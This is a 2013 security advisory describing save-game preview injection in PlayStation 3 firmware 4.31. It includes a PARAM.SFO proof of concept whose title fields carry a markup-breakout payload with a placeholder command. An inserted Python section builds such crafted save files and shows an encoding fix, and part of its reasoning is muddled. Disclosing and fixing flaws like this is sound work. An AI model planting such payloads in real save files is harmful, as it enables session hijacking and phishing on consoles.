Title:
======
Sony PS3 Firmware v4.31 - Code Execution Vulnerability

Date:
=====
2013-05-12


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=767


VL-ID:
=====
767


Common Vulnerability Scoring System:
====================================
6.5


Introduction:
=============
The PlayStation 3 is the third home video game console produced by Sony 
Computer Entertainment and the successor to the 
PlayStation 2 as part of the PlayStation series. The PlayStation 3 competes 
with Microsoft's Xbox 360 and Nintendo's Wii 
as part of the seventh generation of video game consoles. It was first released 
on November 11, 2006, in Japan, with 
international markets following shortly thereafter.

Major features of the console include its unified online gaming service, the 
PlayStation Network, its multimedia capabilities, 
connectivity with the PlayStation Portable, and its use of the Blu-ray Disc as 
its primary storage medium.

(Copy of the Homepage: http://en.wikipedia.org/wiki/PlayStation_3 )


PlayStation Network, often abbreviated as PSN, is an online multiplayer gaming 
and digital media delivery service provided/run 
by Sony Computer Entertainment for use with the PlayStation 3, PlayStation 
Portable, and PlayStation Vita video game consoles. 
The PlayStation Network is the video game portion of the Sony Entertainment 
Network.

(Copy of the Homepage: http://en.wikipedia.org/wiki/PlayStation_Network)


Abstract:
=========
The Vulnerability Laboratory Research Team discovered a local code execution 
vulnerability in the official PlayStation 3 firmware v4.31.


Report-Timeline:
================
2012-10-26:     Researcher Notification & Coordination
2012-11-18:     Vendor Notification 1
2012-12-14:     Vendor Notification 2
2013-01-18:     Vendor Notification 3
2013-**-**:     Vendor Response/Feedback
2013-05-01:     Vendor Fix/Patch by Check
2013-05-13:     Public Disclosure


Status:
========
Published


Affected Products:
==================
Sony
Product: PlayStation 3 Firmware 4.31


Exploitation-Technique:
=======================
Local


Severity:
=========
High


Details:
========
A local code execution vulnerability has been identified in the official 
PlayStation 3 firmware v4.31. 
The vulnerability allows local attackers to inject and execute code in the 
context of the PS3 main menu's save-game preview. 

The PS3 uses three types of save games. This report covers only the save games 
that carry a PARAM.SFO file.
The PARAM.SFO in a save-game folder (on a USB device or the PS3 hard disk) holds 
the strings the menu preview displays, 
for example the scrolling title text, next to the video, sound and background 
picture. When a save game is loaded from 
USB or the hard disk, the firmware parses these values and redisplays the title 
and detail text. The filtering applied when 
the preview is imported can be bypassed by injecting script code or PS3 
firmware-specific commands character by character 
instead of as a whole string.

The attacker syncs the save game between a computer and a USB device (to change 
the USB context), connects the three 
(USB, computer, PS3), updates the save game on the computer and then triggers 
the injected content directly from the 
save-game preview listing on the PS3 (USB or hard disk). Exploitation requires 
local system access, a manipulated .sfo file 
and a USB device. The attacker is limited to the byte size allotted to the 
saved string (the attribute values) when 
injecting commands or script code.

The filter of the Saved Data Utility module (German UI: SpeicherDaten 
(DienstProgramm)) does not recognize special 
characters and applies no input restrictions. Attackers can therefore 
manipulate the .sfo file of a save game to execute 
system-specific commands or to inject persistent malicious script code.

Successful exploitation of the vulnerability can result in persistent (but 
local) execution of system commands, PSN session 
hijacking, persistent phishing attacks, redirects out of the vulnerable module 
and stable, persistent manipulation of the 
save-game preview listing.


Vulnerable Section(s):
                                [+] PS Menu > Game (German UI: Spiel)

Vulnerable Module(s):
                                [+] Saved Data Utility (German UI: SpeicherDaten 
(DienstProgramm)) PS3 > USB Device (USB Gerät)

Affected Section(s):
                                [+] Title - Save Game Preview Resource (Detail 
Listing)


Proof of Concept:
=================
The firmware preview listing validation vulnerability can be exploited by local 
attackers with low or medium user interaction.
To demonstrate or reproduce it:

The attacker syncs the save game between a computer and a USB device (to change 
the USB context), connects the three
(USB, computer, PS3), updates the save game on the computer and then triggers 
the injected content directly from the 
save-game preview listing on the PS3 (USB or hard disk). Exploitation requires 
local system access, a manipulated .sfo file 
and a USB device. The attacker is limited to the byte size allotted to the 
saved string (the attribute values) when 
injecting commands or script code.

The filter of the Saved Data Utility module (German UI: SpeicherDaten 
(DienstProgramm)) does not recognize special 
characters and applies no input restrictions. Attackers can manipulate the .sfo 
file of a save game to execute 
system-specific commands or to inject persistent malicious script code via the 
save-game preview listing.

Note: injecting complete frames or commands unknown to the system (e.g. 
jailbreak commands) in one go, without passing 
them through the filter character by character and syncing the result as an 
update, will fail to reproduce the issue.

PoC: PARAM.SFO

[PSF magic, header and binary index table: non-printable, not reproduced]

[key table]
ACCOUNT_ID ATTRIBUTE CATEGORY DETAIL PARAMS PARAMS2 PARENTAL_LEVEL 
SAVEDATA_DIRECTORY SAVEDATA_LIST_PARAM SUB_TITLE TITLE

[data table, printable values only]
40ac78551a88fdc
SD
PSHACK: Benjamin Ninja H%20'>"<[PERSISTENT INJECTED SYSTEM COMMAND OR CODE!]

Hackizeit: 1:33:07

ExpSkills: VL-LAB-TRAINING

Operation: 1%
Trojaners: 0%
[binary data, not reproduced] 40ac78551a88fdc
...
BLES00371-NARUTO_STORM-0
HACKINGBKM 1
PSHACK: Benjamin Ninja H%20'>"<[PERSISTENT INJECTED SYSTEM COMMAND OR CODE!];



Solution:
=========
Restrict the save-game name input and disallow special characters.
Encode the save-game values before redisplaying them in the game's menu preview.
Parse and validate the strings and values from save games even when they arrive 
piecewise (string by string) via sync.
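The PARAM.SFO layout behind the PoC dump, and the "encode the values" fix from the solution, as an added example. This is not code from the advisory and not Sony's firmware; it is a small PSF reader/writer in the format as documented by the PS3 homebrew scene (header, 16-byte index entries, sorted key table, data table with per-value slot sizes), with a constructed sample file carrying the strings visible in the dump. The slot sizes, the numeric ATTRIBUTE/PARENTAL_LEVEL values, the PARAMS contents and the placement of "HACKINGBKM 1" in SAVEDATA_LIST_PARAM are assumptions. With the eleven keys of the dump the key table lands at offset 196 (0xC4) and the data table at 320 (0x140), which is consistent with the bytes that appear right after the "PSF" magic in the dump. The writer refuses a value that is longer than its slot, which is the byte-size bound the advisory mentions; `preview_listing` returns the TITLE/SUB_TITLE/DETAIL strings raw (the vulnerable behaviour) or encoded (the recommended fix).

```python
import struct

# PSF (PARAM.SFO) layout constants, PS3 homebrew-scene documentation of the format
PSF_MAGIC = b"\x00PSF"
PSF_VERSION = 0x00000101
FMT_BYTES = 0x0004    # raw bytes / UTF-8 without NUL terminator (ACCOUNT_ID, PARAMS)
FMT_UTF8 = 0x0204     # NUL-terminated UTF-8 string (TITLE, SUB_TITLE, DETAIL, ...)
FMT_UINT32 = 0x0404   # little-endian 32-bit integer (ATTRIBUTE, PARENTAL_LEVEL)
HEADER_LEN = 20       # magic, version, key_table_start, data_table_start, entry count
INDEX_ENTRY_LEN = 16  # key_off(u16) fmt(u16) data_len(u32) data_max_len(u32) data_off(u32)

PREVIEW_KEYS = ("TITLE", "SUB_TITLE", "DETAIL")   # strings the save-data preview shows

# Payload string exactly as it appears in the advisory's dump
PAYLOAD = "PSHACK: Benjamin Ninja H%20'>\"<[PERSISTENT INJECTED SYSTEM COMMAND OR CODE!]"


def _align4(n):
    return (n + 3) & ~3


def build_sfo(entries):
    """Serialise [(key, fmt, value, max_len), ...] into a PARAM.SFO blob.

    max_len is the slot the firmware allots to a value; a longer value is
    rejected, mirroring the byte-size bound the advisory describes.
    """
    entries = sorted(entries, key=lambda e: e[0])   # the PSF key table is sorted
    key_table, key_offsets = bytearray(), []
    for key, _fmt, _value, _max in entries:
        key_offsets.append(len(key_table))
        key_table += key.encode("ascii") + b"\x00"
    key_table += b"\x00" * (_align4(len(key_table)) - len(key_table))

    key_table_start = HEADER_LEN + INDEX_ENTRY_LEN * len(entries)
    data_table_start = key_table_start + len(key_table)

    index, data = bytearray(), bytearray()
    for (key, fmt, value, max_len), koff in zip(entries, key_offsets):
        if fmt == FMT_UINT32:
            raw, max_len = struct.pack("<I", value), 4
        elif fmt == FMT_UTF8:
            raw = value.encode("utf-8") + b"\x00"
        else:
            raw = bytes(value)
        if len(raw) > max_len:
            raise ValueError(f"{key}: {len(raw)} bytes exceed the {max_len}-byte slot")
        index += struct.pack("<HHIII", koff, fmt, len(raw), max_len, len(data))
        data += raw + b"\x00" * (_align4(max_len) - len(raw))   # pad slot to 4 bytes

    header = PSF_MAGIC + struct.pack("<IIII", PSF_VERSION, key_table_start,
                                     data_table_start, len(entries))
    return bytes(header + index + key_table + data)


def parse_sfo(blob):
    """Parse a PARAM.SFO blob into {key: (fmt, value, max_len)} in key-table order."""
    if blob[:4] != PSF_MAGIC:
        raise ValueError("not a PSF file")
    _version, kts, dts, count = struct.unpack_from("<IIII", blob, 4)
    result = {}
    for i in range(count):
        koff, fmt, dlen, dmax, doff = struct.unpack_from(
            "<HHIII", blob, HEADER_LEN + INDEX_ENTRY_LEN * i)
        key = blob[kts + koff:blob.index(b"\x00", kts + koff)].decode("ascii")
        raw = blob[dts + doff:dts + doff + dlen]
        if fmt == FMT_UINT32:
            value = struct.unpack("<I", raw)[0]
        elif fmt == FMT_UTF8:
            value = raw.rstrip(b"\x00").decode("utf-8", "replace")
        else:
            value = raw
        result[key] = (fmt, value, dmax)
    return result


def sanitize_for_display(text, max_len):
    """Hardened rendering: drop control characters (newline and tab kept), escape
    markup-significant characters and cut to the slot size in bytes. This is an
    assumed reading of the vendor-side "encode the values" fix, not Sony's code."""
    escapes = {"<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;", "&": "&amp;"}
    kept = (ch for ch in text if (ch >= " " and ch != "\x7f") or ch in "\n\t")
    escaped = "".join(escapes.get(ch, ch) for ch in kept)
    return escaped.encode("utf-8")[:max_len].decode("utf-8", "ignore")


def preview_listing(sfo, safe=False):
    """The strings the save-data preview displays: raw (vulnerable) or encoded."""
    out = {}
    for key in PREVIEW_KEYS:
        _fmt, value, max_len = sfo[key]
        out[key] = sanitize_for_display(value, max_len) if safe else value
    return out


def payload_fits(payload, max_len):
    """True if the NUL-terminated UTF-8 form of payload fits the value's slot."""
    return len(payload.encode("utf-8")) + 1 <= max_len


# Constructed sample modelled on the advisory's dump: same eleven keys and the same
# printable strings; slot sizes, numeric values and PARAMS bytes are assumptions.
SAMPLE_ENTRIES = [
    ("ACCOUNT_ID", FMT_BYTES, b"40ac78551a88fdc\x00", 16),
    ("ATTRIBUTE", FMT_UINT32, 0, 4),
    ("CATEGORY", FMT_UTF8, "SD", 4),
    ("DETAIL", FMT_UTF8, "Hackizeit: 1:33:07\nExpSkills: VL-LAB-TRAINING\n"
                         "Operation: 1%\nTrojaners: 0%", 1024),
    ("PARAMS", FMT_BYTES, b"\x00" * 1024, 1024),
    ("PARAMS2", FMT_BYTES, b"\x00" * 12, 12),
    ("PARENTAL_LEVEL", FMT_UINT32, 0, 4),
    ("SAVEDATA_DIRECTORY", FMT_UTF8, "BLES00371-NARUTO_STORM-0", 64),
    ("SAVEDATA_LIST_PARAM", FMT_UTF8, "HACKINGBKM 1", 64),   # placement assumed
    ("SUB_TITLE", FMT_UTF8, PAYLOAD + ";", 128),
    ("TITLE", FMT_UTF8, PAYLOAD, 128),
]

if __name__ == "__main__":
    blob = build_sfo(SAMPLE_ENTRIES)
    sfo = parse_sfo(blob)
    print("raw preview:    ", preview_listing(sfo)["TITLE"])
    print("encoded preview:", preview_listing(sfo, safe=True)["TITLE"])
    print("fits 128-byte slot:", payload_fits(PAYLOAD, 128))
```

Run it as a script to see the raw title next to its encoded form; `build_sfo` raising on an oversized value is what stops an attacker from growing a string beyond the slot the firmware allotted, which is why the advisory's payload has to fit inside the existing attribute length.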


Risk:
=====
The security risk of this easily exploitable, local vulnerability is estimated 
as critical; it needs to be fixed soon.


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri  
(b...@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com              
               - www.vulnerability-lab.com/register
Contact:    ad...@vulnerability-lab.com         - supp...@vulnerability-lab.com 
               - resea...@vulnerability-lab.com
Section:    video.vulnerability-lab.com         - forum.vulnerability-lab.com   
               - news.vulnerability-lab.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab 
               - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

                                        Copyright © 2013 | Vulnerability 
Laboratory

-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

